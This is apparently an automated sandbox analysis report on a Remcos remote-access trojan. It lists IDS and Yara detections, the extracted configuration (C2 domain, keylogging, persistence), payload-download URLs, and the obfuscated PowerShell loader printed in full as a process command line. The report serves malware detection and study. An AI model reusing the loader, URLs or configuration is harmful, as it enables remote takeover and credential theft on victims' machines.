';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverpl

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-30T09:57:38.903941+020028033053Unknown Traffic192.168.2.449731142.250.185.142443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-30T09:58:20.117429+020028032702Potentially Bad Traffic192.168.2.451425142.250.185.142443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for domain / URL
              Source: a458386d9.duckdns.orgVirustotal: Detection: 13%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5376, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:51425 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.4:51426 version: TLS 1.2
              Source: Binary string: tem.Core.pdbY source: powershell.exe, 00000006.00000002.2493008663.00000000083B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdb.pdb source: powershell.exe, 00000001.00000002.2112123341.000001E57FD65000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\System.pdb source: powershell.exe, 00000001.00000002.2112123341.000001E57FD65000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bpdbtem.pdbw` source: powershell.exe, 00000001.00000002.2112123341.000001E57FD65000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbJ source: powershell.exe, 00000006.00000002.2493008663.00000000083B0000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: a458386d9.duckdns.org
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 142.250.185.142:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:51425 -> 142.250.185.142:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.2070849929.000001E5698D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000001.00000002.2070849929.000001E569785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.2070849929.000001E5679C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2456593952.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.2070849929.000001E5679C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2456593952.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
              Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.2070849929.000001E569698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000001.00000002.2070849929.000001E5698D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/6
              Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHHP
              Source: powershell.exe, 00000006.00000002.2456593952.0000000004A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHHXR
              Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2453434788.0000000004A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8
              Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8n
              Source: powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569BA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000008.00000002.2452849140.00000000046D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2435697705.00000000046E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569BA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH&export=download
              Source: msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2452849140.00000000046D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2435697705.00000000046E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8&export=download
              Source: powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:PSGP
              Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.2070849929.000001E568862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51425
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51426
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51426 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51425 -> 443
              Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:51425 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.4:51426 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5376, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_3020.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_5728.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3020, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5728, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrk
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkJump to behavior
